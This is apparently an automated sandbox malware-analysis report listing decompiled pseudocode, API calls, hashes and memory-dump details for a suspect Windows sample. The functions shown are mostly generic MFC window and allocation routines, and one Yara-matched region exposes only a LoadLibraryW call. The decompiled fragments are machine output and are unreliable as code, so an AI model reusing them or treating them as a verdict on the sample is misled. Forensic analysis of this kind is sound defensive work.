                  0x00407af1
                  0x00407b30
                  0x00407b32
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00407af3
                  0x00407af7
                  0x00407b0c
                  0x00407b15
                  0x00407b15
                  0x00407b18
                  0x00407b25
                  0x00407b25
                  0x00407b1a
                  0x00407b1d
                  0x00407b1d
                  0x00407b28
                  0x00407b2c
                  0x00000000
                  0x00407b2c
                  0x00407ae9
                  0x00407ae9
                  0x00407aea
                  0x00407aea
                  0x00407aea
                  0x00407adb
                  0x00407adb
                  0x00407adc
                  0x00407adc
                  0x00407acf
                  0x00407acf
                  0x00407acf
                  0x00407ad0
                  0x00407ad0
                  0x00407acd
                  0x00407b47
                  0x00407b48
                  0x00407b4d
                  0x00407b4d
                  0x00407b5c
                  0x00407b6a
                  0x00407b6c
                  0x00407b6f
                  0x00407b7f
                  0x00407b82
                  0x00407b85
                  0x00407b88
                  0x00407b8e
                  0x00407b97
                  0x00407b9a
                  0x00407b9d
                  0x00407b9f
                  0x00407ba3
                  0x00407baa
                  0x00407baa
                  0x00407bad
                  0x00407bb0
                  0x00407bb0
                  0x00407bb3
                  0x00407bb6
                  0x00407bc1
                  0x00407bcc
                  0x00407bd5
                  0x00407bd5
                  0x00407bd8
                  0x00407bdb
                  0x00407bde
                  0x00407be1
                  0x00407be3
                  0x00407be6
                  0x00407be9
                  0x00407bec
                  0x00407bef
                  0x00407bef
                  0x00407bf5
                  0x00000000
                  0x00000000
                  0x00407bfb
                  0x00407c02
                  0x00407c07
                  0x00407c0b
                  0x00407c13
                  0x00407c1f
                  0x00407c24
                  0x00407c27
                  0x00407c2b
                  0x00407c2e
                  0x00407c34
                  0x00407c35
                  0x00407c36
                  0x00407c37
                  0x00407c38
                  0x00407c38
                  0x00407c3b
                  0x00407c3c
                  0x00407c42
                  0x00407c45
                  0x00407c48
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00407c48
                  0x00407c4a
                  0x00407c4d
                  0x00407c4d
                  0x00407bb6
                  0x00407c50
                  0x00407c58
                  0x00407c60
                  0x00407c60
                  0x00407c63
                  0x00407c67
                  0x00407c69
                  0x00407c6e
                  0x00407c71
                  0x00407c79
                  0x00407c7e
                  0x00407c81
                  0x00407c85
                  0x00407c71
                  0x00407c8e
                  0x00407c9a
                  0x00407c9d
                  0x00407ca3
                  0x00407ca8
                  0x00407cad
                  0x00407cb2
                  0x00407cbb
                  0x00407cde
                  0x00407cfa
                  0x00407cff
                  0x00407d02
                  0x00407d02
                  0x00407d05
                  0x00407d08
                  0x00407d08
                  0x00407d08
                  0x00407d0b
                  0x00407d0b
                  0x00407d13
                  0x00407d18
                  0x00407d1c
                  0x00407d1c
                  0x00407d25
                  0x00407d2a
                  0x00407aae
                  0x00407a8a
                  0x00407d2f
                  0x00407d44
                  0x00407d51
                  0x00407d5c
                  0x00407d69
                  0x00407d6e
                  0x00407d73
                  0x00407d75
                  0x00407d75
                  0x00407d78
                  0x00407d7a
                  0x00407d80
                  0x00407d82
                  0x00407d82
                  0x00407d85
                  0x00407d8e

                  APIs
                  • SetRectEmpty.USER32(?), ref: 00407D2F
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetWindowRect.USER32 ref: 00407CBB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$EmptyWindow_malloc
                  • String ID: @
                  • API String ID: 299164714-2766056989
                  • Opcode ID: be64618f2995d1ac5620793d283faa2dacdca16006dd552ff218ca8fd73bee1b
                  • Instruction ID: a71238d07f4ff9f52c397f01adc39de216819e658bc352016629bc36c2669070
                  • Opcode Fuzzy Hash: be64618f2995d1ac5620793d283faa2dacdca16006dd552ff218ca8fd73bee1b
                  • Instruction Fuzzy Hash: CDC15B71E04209AFCF14CFA8C884AEEB7B5FF48304F14816AE915BB291DB38A941CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C322, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 235windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0041C322(void* __ebx, int __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t91;
				intOrPtr _t95;
				signed short _t97;
				signed short _t98;
				signed short _t101;
				signed short _t103;
				signed short _t108;
				signed short _t114;
				signed int* _t118;
				signed short _t132;
				signed short _t135;
				signed short _t139;
				signed short _t140;
				signed short _t162;
				intOrPtr* _t167;
				signed short _t178;
				signed short _t192;
				intOrPtr* _t196;
				int _t198;
				intOrPtr* _t199;
				void* _t200;

				_push(0x3c);
				E00431A9B(E0044B99F, __ebx, __edi, __esi);
				_t198 = __ecx;
				 *(_t200 - 0x10) = __ecx;
				_t196 = E0040F898(__ecx);
				_t91 = E0041E9BB(0x44ff98, _t196);
				_t202 = _t91;
				if(_t91 == 0) {
					_t196 = E00403AA0();
				}
				E00404A80(_t200 - 0x48);
				 *((intOrPtr*)(_t200 - 0x38)) = _t196;
				 *((intOrPtr*)(_t200 - 0x44)) =  *((intOrPtr*)(_t198 + 0x54));
				 *((intOrPtr*)(_t200 - 0x3c)) = _t198;
				_t199 = E0041E928( *(_t200 + 0x10), _t202);
				if(_t199 != 0) {
					_t95 =  *((intOrPtr*)(_t200 + 0x14));
					 *((intOrPtr*)(_t199 + 0xa8)) = _t95;
					 *((intOrPtr*)( *_t196 + 0x168))(1, _t95);
					_t97 = E00404461(__eflags, 0xa8);
					 *(_t200 + 0x10) = _t97;
					 *(_t200 - 4) = 0;
					__eflags = _t97;
					if(__eflags == 0) {
						_t98 = 0;
						__eflags = 0;
					} else {
						_t98 = E0042DDDF(_t97, __eflags);
					}
					 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
					 *(_t199 + 0xac) = _t98;
					_t101 = E0041E9BB("�IE",  *((intOrPtr*)( *_t196 + 0x148))());
					 *(_t200 + 0x10) = _t101;
					__eflags = _t101;
					if(_t101 == 0) {
						_t191 =  *(_t200 + 8) & 0x0000ffff;
						_t103 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))(_t196,  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
						__eflags = _t103;
						if(_t103 == 0) {
							goto L9;
						}
						 *( *(_t199 + 0xac) + 0x58) = 1;
						goto L25;
					} else {
						_t132 = E0041E9BB(0x4549cc,  *((intOrPtr*)( *(_t200 - 0x10) + 0x54)));
						 *(_t200 - 0x14) = _t132;
						__eflags = _t132;
						if(_t132 != 0) {
							_t178 =  *(_t200 + 0x10);
							_t192 =  *(_t178 + 0x10c);
							 *(_t200 - 0x10) = _t192;
							__eflags = _t192;
							if(_t192 == 0) {
								 *(_t200 - 0x10) =  *(_t178 + 0x108);
							}
							 *((intOrPtr*)( *_t132 + 0x110))(0);
							__eflags =  *(_t200 - 0x10);
							if( *(_t200 - 0x10) == 0) {
								goto L9;
							} else {
								_t191 =  *(_t200 + 8) & 0x0000ffff;
								_t135 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))( *(_t200 - 0x10),  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
								__eflags = _t135;
								if(_t135 == 0) {
									goto L9;
								}
								 *( *(_t199 + 0xac) + 0x58) = 1;
								E00420CB9( *(_t199 + 0xac),  *(_t200 + 0x10));
								 *(_t200 - 0x10) = 0;
								 *(_t200 + 8) = 0;
								 *(_t200 - 4) = 1;
								_t139 = E0041B4D2( *(_t200 + 0x10), _t200 + 8);
								__eflags = _t139;
								if(_t139 < 0) {
									E0041B4A1( *(_t200 + 0x10), _t200 + 8);
									 *(_t200 - 0x10) = 1;
								}
								_t140 =  *(_t200 + 8);
								__eflags = _t140;
								if(_t140 != 0) {
									 *((intOrPtr*)( *_t140 + 0x14))(_t140, _t200 - 0x34);
									_t191 = _t200 - 0x34;
									 *((intOrPtr*)( *( *(_t200 - 0x14)) + 0x12c))(_t200 - 0x34,  *(_t200 + 8),  *(_t200 - 0x10));
									_t140 =  *(_t200 + 8);
								}
								 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
								 *( *(_t200 + 0x10) + 0x154) = 1;
								__eflags = _t140;
								if(_t140 != 0) {
									 *((intOrPtr*)( *_t140 + 8))(_t140);
								}
								L25:
								 *((intOrPtr*)(_t200 - 0x24)) = 0;
								 *((intOrPtr*)(_t200 - 0x20)) = 0;
								 *((intOrPtr*)(_t200 - 0x1c)) = 0;
								 *((intOrPtr*)(_t200 - 0x18)) = 0;
								_t114 =  *((intOrPtr*)( *_t199 + 0x54))(0, 0, 0x50800000, _t200 - 0x24, _t196, 0xe900, _t200 - 0x48);
								_t167 = _t196;
								__eflags = _t114;
								if(_t114 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x14)) + 0xc)) = E0040835B(_t167);
									_t118 = E0040835B( *((intOrPtr*)( *_t196 + 0x148))());
									__eflags = _t118;
									if(__eflags != 0) {
										_t191 =  *_t118;
										 *((intOrPtr*)( *_t118 + 0x168))(0, _t118, _t118);
									}
									__eflags = E0041BD1E(0, _t199, _t191, _t196, _t199, __eflags,  *((intOrPtr*)(_t200 + 0xc)));
									if(__eflags != 0) {
										E00408362(_t196, _t199, 1);
										SendMessageA( *( *(_t199 + 0xac) + 0x20), 0x363, 1, 0);
										 *((intOrPtr*)( *_t196 + 0x150))(1);
										UpdateWindow( *(_t196 + 0x20));
									} else {
										E0041B668(_t199, __eflags);
									}
									_t108 = 1;
									__eflags = 1;
									goto L33;
								}
								 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
								L12:
								 *((intOrPtr*)(_t199 + 0xa8)) = 0;
								 *((intOrPtr*)( *_t199 + 4))(1);
								goto L3;
							}
						}
						L9:
						 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
						_t162 =  *(_t199 + 0xac);
						__eflags = _t162;
						if(_t162 != 0) {
							 *((intOrPtr*)( *_t162 + 4))(1);
						}
						 *(_t199 + 0xac) = 0;
						goto L12;
					}
				} else {
					L3:
					_t108 = 0;
					L33:
					return E00431B73(_t108);
				}
			}
























                  0x0041c322
                  0x0041c329
                  0x0041c32e
                  0x0041c330
                  0x0041c338
                  0x0041c340
                  0x0041c347
                  0x0041c349
                  0x0041c350
                  0x0041c350
                  0x0041c355
                  0x0041c360
                  0x0041c363
                  0x0041c366
                  0x0041c36e
                  0x0041c374
                  0x0041c37d
                  0x0041c381
                  0x0041c38d
                  0x0041c398
                  0x0041c39e
                  0x0041c3a1
                  0x0041c3a4
                  0x0041c3a6
                  0x0041c3b1
                  0x0041c3b1
                  0x0041c3a8
                  0x0041c3aa
                  0x0041c3aa
                  0x0041c3b3
                  0x0041c3b7
                  0x0041c3cd
                  0x0041c3d4
                  0x0041c3d7
                  0x0041c3d9
                  0x0041c513
                  0x0041c52b
                  0x0041c531
                  0x0041c533
                  0x00000000
                  0x00000000
                  0x0041c53f
                  0x00000000
                  0x0041c3df
                  0x0041c3ea
                  0x0041c3f1
                  0x0041c3f4
                  0x0041c3f6
                  0x0041c431
                  0x0041c434
                  0x0041c43a
                  0x0041c43d
                  0x0041c43f
                  0x0041c447
                  0x0041c447
                  0x0041c44f
                  0x0041c455
                  0x0041c458
                  0x00000000
                  0x0041c45a
                  0x0041c45a
                  0x0041c474
                  0x0041c47a
                  0x0041c47c
                  0x00000000
                  0x00000000
                  0x0041c48b
                  0x0041c498
                  0x0041c49d
                  0x0041c4a0
                  0x0041c4aa
                  0x0041c4b1
                  0x0041c4b6
                  0x0041c4b8
                  0x0041c4c1
                  0x0041c4c6
                  0x0041c4c6
                  0x0041c4cd
                  0x0041c4d0
                  0x0041c4d2
                  0x0041c4db
                  0x0041c4e9
                  0x0041c4ed
                  0x0041c4f3
                  0x0041c4f3
                  0x0041c4f9
                  0x0041c4fd
                  0x0041c507
                  0x0041c509
                  0x0041c50e
                  0x0041c50e
                  0x0041c546
                  0x0041c55f
                  0x0041c562
                  0x0041c565
                  0x0041c568
                  0x0041c56b
                  0x0041c56e
                  0x0041c570
                  0x0041c572
                  0x0041c58d
                  0x0041c59c
                  0x0041c5a1
                  0x0041c5a3
                  0x0041c5a5
                  0x0041c5ac
                  0x0041c5ac
                  0x0041c5bc
                  0x0041c5be
                  0x0041c5ce
                  0x0041c5e4
                  0x0041c5f0
                  0x0041c5f9
                  0x0041c5c0
                  0x0041c5c2
                  0x0041c5c2
                  0x0041c601
                  0x0041c601
                  0x00000000
                  0x0041c601
                  0x0041c57a
                  0x0041c41d
                  0x0041c41d
                  0x0041c429
                  0x00000000
                  0x0041c429
                  0x0041c458
                  0x0041c3f8
                  0x0041c400
                  0x0041c406
                  0x0041c40c
                  0x0041c40e
                  0x0041c414
                  0x0041c414
                  0x0041c417
                  0x00000000
                  0x0041c417
                  0x0041c376
                  0x0041c376
                  0x0041c376
                  0x0041c602
                  0x0041c607
                  0x0041c607

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C329
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • SendMessageA.USER32(?,00000363,00000001,00000000), ref: 0041C5E4
                  • UpdateWindow.USER32(?), ref: 0041C5F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSendUpdateWindow_malloc
                  • String ID: IE
                  • API String ID: 291802051-3275544015
                  • Opcode ID: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction ID: d0b6d8a432cfeddc55617652b4a4c4f0c68d15cc15fa885d4595bbb90d12322d
                  • Opcode Fuzzy Hash: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction Fuzzy Hash: 7A917C70600215EFCB04DFA5C888AEEB7B5FF48304F20852EF8569B391DB79A981CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040BF7C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040BF7C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t77;
				signed int* _t89;
				intOrPtr _t91;
				signed int* _t94;
				intOrPtr* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t111;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				intOrPtr* _t122;
				signed int _t125;
				intOrPtr* _t127;
				void* _t128;

				_push(0x38);
				_t77 = E00431A9B(E0044AF82, __ebx, __edi, __esi);
				_t127 = __ecx;
				_t100 = 0;
				if( *(_t128 + 8) != 0) {
					GetWindowRect( *(__ecx + 0x20), _t128 - 0x30);
					OffsetRect(_t128 - 0x30,  ~( *(_t128 - 0x30)),  ~( *(_t128 - 0x2c)));
					 *((intOrPtr*)( *_t127 + 0x148))(_t128 - 0x30, 1);
					 *((intOrPtr*)( *_t127 + 0x118))(0x407, 0, _t128 - 0x20);
					_t89 =  *(_t127 + 0x74);
					_t125 =  *((intOrPtr*)(_t128 - 0x28)) -  *(_t128 - 0x30) +  *((intOrPtr*)(_t128 - 0x18));
					_t111 =  *((intOrPtr*)(_t127 + 0x78));
					 *(_t128 + 8) = 0;
					if(_t89 > 0) {
						_t117 = _t111 + 4;
						 *(_t128 - 0x14) = _t89;
						do {
							if(( *(_t117 + 4) & 0x08000000) != 0) {
								 *(_t128 + 8) =  *(_t128 + 8) + 1;
							}
							_t119 = 0xfffffffa;
							_t120 = _t119 -  *_t117;
							_t117 = _t117 + 0x14;
							_t118 = _t120 -  *((intOrPtr*)(_t128 - 0x18));
							_t125 = _t125 + _t120 -  *((intOrPtr*)(_t128 - 0x18));
							_t24 = _t128 - 0x14;
							 *_t24 =  *(_t128 - 0x14) - 1;
						} while ( *_t24 != 0);
					}
					 *((intOrPtr*)(_t128 - 0x44)) = 0x450958;
					 *(_t128 - 0x40) = _t100;
					 *(_t128 - 0x34) = _t100;
					 *(_t128 - 0x38) = _t100;
					 *(_t128 - 0x3c) = _t100;
					_t31 = _t128 - 0x44; // 0x450958
					 *(_t128 - 4) = _t100;
					E0040BB4C(_t31, _t125, _t89, 0xffffffff);
					 *(_t128 - 0x10) =  *(_t128 - 0x10) & 0x00000000;
					_t101 =  *((intOrPtr*)(_t128 - 0x20));
					_t91 =  *((intOrPtr*)(_t127 + 0x78));
					if( *(_t127 + 0x74) > 0) {
						_t94 = _t91 + 8;
						 *(_t128 - 0x14) = _t94;
						while(1) {
							_t102 = _t101 +  *((intOrPtr*)(_t94 - 4)) + 6;
							if(( *_t94 & 0x08000000) != 0 && _t125 > 0) {
								_t97 = _t125;
								asm("cdq");
								_t98 = _t97 /  *(_t128 + 8);
								_t118 = _t97 %  *(_t128 + 8);
								_t102 = _t102 + _t98;
								 *(_t128 + 8) =  *(_t128 + 8) - 1;
								_t125 = _t125 - _t98;
							}
							_t54 = _t128 - 0x44; // 0x450958
							_t95 = E0040B917(_t54,  *(_t128 - 0x10));
							 *(_t128 - 0x14) =  &(( *(_t128 - 0x14))[5]);
							 *_t95 = _t102;
							_t101 = _t102 +  *((intOrPtr*)(_t128 - 0x18));
							 *(_t128 - 0x10) =  *(_t128 - 0x10) + 1;
							if( *(_t128 - 0x10) >=  *(_t127 + 0x74)) {
								goto L13;
							}
							_t94 =  *(_t128 - 0x14);
						}
					}
					L13:
					 *((intOrPtr*)( *_t127 + 0x118))(0x404,  *(_t127 + 0x74),  *(_t128 - 0x40));
					 *(_t128 - 4) =  *(_t128 - 4) | 0xffffffff;
					_t67 = _t128 - 0x44; // 0x450958
					_t77 = E0040BC87(_t67);
					_t100 = 0;
				}
				if( *((intOrPtr*)(_t128 + 0xc)) != _t100) {
					_t77 =  *((intOrPtr*)(_t127 + 0x78));
					if( *(_t127 + 0x74) > _t100) {
						_t122 = _t77 + 0x10;
						do {
							_t144 =  *(_t122 - 4) & 0x00000001;
							if(( *(_t122 - 4) & 0x00000001) != 0) {
								_push(1);
								_push( *_t122);
								_push(_t100);
								_t77 = E0040BE87(_t100, _t127, _t118, _t122, _t127, _t144);
							}
							_t122 = _t122 + 0x14;
							_t100 = _t100 + 1;
						} while (_t100 <  *(_t127 + 0x74));
					}
				}
				return E00431B73(_t77);
			}





















                  0x0040bf7c
                  0x0040bf83
                  0x0040bf88
                  0x0040bf8a
                  0x0040bf8f
                  0x0040bf9c
                  0x0040bfb2
                  0x0040bfc2
                  0x0040bfd6
                  0x0040bfe2
                  0x0040bfe5
                  0x0040bfea
                  0x0040bfed
                  0x0040bff0
                  0x0040bff2
                  0x0040bff5
                  0x0040bff8
                  0x0040bfff
                  0x0040c001
                  0x0040c001
                  0x0040c006
                  0x0040c007
                  0x0040c009
                  0x0040c00c
                  0x0040c00f
                  0x0040c011
                  0x0040c011
                  0x0040c011
                  0x0040bff8
                  0x0040c016
                  0x0040c01d
                  0x0040c020
                  0x0040c023
                  0x0040c026
                  0x0040c02c
                  0x0040c02f
                  0x0040c032
                  0x0040c037
                  0x0040c03f
                  0x0040c042
                  0x0040c045
                  0x0040c047
                  0x0040c04a
                  0x0040c052
                  0x0040c05b
                  0x0040c05f
                  0x0040c065
                  0x0040c067
                  0x0040c068
                  0x0040c068
                  0x0040c06b
                  0x0040c06d
                  0x0040c070
                  0x0040c070
                  0x0040c075
                  0x0040c078
                  0x0040c07d
                  0x0040c081
                  0x0040c083
                  0x0040c086
                  0x0040c08f
                  0x00000000
                  0x00000000
                  0x0040c04f
                  0x0040c04f
                  0x0040c052
                  0x0040c091
                  0x0040c0a0
                  0x0040c0a6
                  0x0040c0aa
                  0x0040c0ad
                  0x0040c0b2
                  0x0040c0b2
                  0x0040c0b7
                  0x0040c0bc
                  0x0040c0bf
                  0x0040c0c1
                  0x0040c0c4
                  0x0040c0c4
                  0x0040c0c8
                  0x0040c0ca
                  0x0040c0cc
                  0x0040c0d0
                  0x0040c0d1
                  0x0040c0d1
                  0x0040c0d6
                  0x0040c0d9
                  0x0040c0da
                  0x0040c0c4
                  0x0040c0bf
                  0x0040c0e4

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$H_prolog3OffsetWindow
                  • String ID: XE
                  • API String ID: 587651453-1251649612
                  • Opcode ID: 8c65d8e29cee3d10715b3d07ffeddea803d4f919f722eecb94ccc229256a07a0
                  • Instruction ID: 6f3991411b2553dd1bfb6b8d3d00d373c4bb3f81e6964f08e69918648d58cc0c
                  • Opcode Fuzzy Hash: 8c65d8e29cee3d10715b3d07ffeddea803d4f919f722eecb94ccc229256a07a0
                  • Instruction Fuzzy Hash: EA516C7190060ADFDB15CFE8C9C5AAEBBB1FF04304F20462EEA56B7291DB34A944CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00411D22, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00411D22(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E0041EDAB(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E0041F363(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E00431D3E(__eflags)));
					_t33 = E00431D3E(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E00431BC3(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E00431D3E(_t69)));
					_t52 = E00431D3E(_t69);
					_push(_a4);
					 *_t52 = 0;
					E00431BC3(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
					L5:
					_t35 = E00431D3E(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E00431D3E(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						E00405B7A( *((intOrPtr*)(E00431D3E(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E004086B0(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(E00411C95(_t55, _t57, 0, _t62, _t71) == 0) {
							E0042280E(_t57);
						}
					}
					return _t62;
				}
			}




























                  0x00411d34
                  0x00411d3c
                  0x00411d44
                  0x00411d79
                  0x00411d80
                  0x00411d83
                  0x00411d88
                  0x00411d8b
                  0x00411d8d
                  0x00411d90
                  0x00411d93
                  0x00411da1
                  0x00000000
                  0x00411d4b
                  0x00411d4b
                  0x00411d4e
                  0x00000000
                  0x00000000
                  0x00411d57
                  0x00411d5a
                  0x00411d5f
                  0x00411d62
                  0x00411d6f
                  0x00411da9
                  0x00411da9
                  0x00411dae
                  0x00411db0
                  0x00411dc1
                  0x00411dc6
                  0x00411dc9
                  0x00411db2
                  0x00411db9
                  0x00411dbe
                  0x00411dbe
                  0x00411dce
                  0x00411dcf
                  0x00411dd0
                  0x00411dd1
                  0x00411dd9
                  0x00411ddb
                  0x00411de0
                  0x00411de8
                  0x00411dee
                  0x00411df4
                  0x00411dfa
                  0x00411e00
                  0x00411e01
                  0x00411e04
                  0x00411e07
                  0x00411e0a
                  0x00411e0d
                  0x00411e17
                  0x00411e19
                  0x00411e19
                  0x00411e17
                  0x00411e24
                  0x00411e24

                  APIs
                  • __snwprintf_s.LIBCMT ref: 00411D6F
                    • Part of subcall function 00431BC3: __vsnprintf_s_l.LIBCMT ref: 00431BDA
                  • __snwprintf_s.LIBCMT ref: 00411DA1
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __snwprintf_s$__getptd_noexit__vsnprintf_s_l
                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                  • API String ID: 3087765582-2801496823
                  • Opcode ID: 79ab1c3d637c257384c0f0185b47a48001210397112bccdcd7fd088eacc47a1d
                  • Instruction ID: 1d495ebfd1f961796ff5d03d660c62335177aa144dd98908c007a65705bb3054
                  • Opcode Fuzzy Hash: 79ab1c3d637c257384c0f0185b47a48001210397112bccdcd7fd088eacc47a1d
                  • Instruction Fuzzy Hash: 14318375E00208AFCB11EFA6D841ADE7BF8EF49354F10442BF914A7361E7389951CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231A312, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0231A558
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ,"E$$DKM]$g{2=
                  • API String ID: 1029625771-544385820
                  • Opcode ID: 1e0d458655c799f3378c465b13394277e0f07ff60eb357dcbb3b163f2b3d19bf
                  • Instruction ID: 54d2279cc7c01944972aa02f38927970c123a4dfaa1a84162971d3f8fcdb7594
                  • Opcode Fuzzy Hash: 1e0d458655c799f3378c465b13394277e0f07ff60eb357dcbb3b163f2b3d19bf
                  • Instruction Fuzzy Hash: 5051C9B4C05369CBEB24DF919A81BCDBB71BB00304F608699C5693B315DB700A86CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401F10, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 56%
                  			E00401F10(signed int _a4) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				signed int _t13;
				signed int _t14;
				signed int _t23;
				intOrPtr* _t25;
				signed int _t27;
				intOrPtr* _t30;

				_t23 = _a4;
				if(_t23 > 0) {
					_t14 = _t13 | 0xffffffff;
					_t27 = _t14 % _t23;
					__eflags = _t14 / _t23 - 2;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E00430B93( &_v12, _t27,  &_a4);
						_t25 =  &_v16;
						_v16 = 0x44ee2c;
						E00430CF4(_t25, 0x45abf8);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t30 = _t25;
						E00430BE6(_t25, _t27, _v20);
						 *_t30 = 0x44ee2c;
						return _t30;
					}
				} else {
					_t23 = 0;
					L2:
					return E00404461(0, _t23 + _t23);
				}
			}












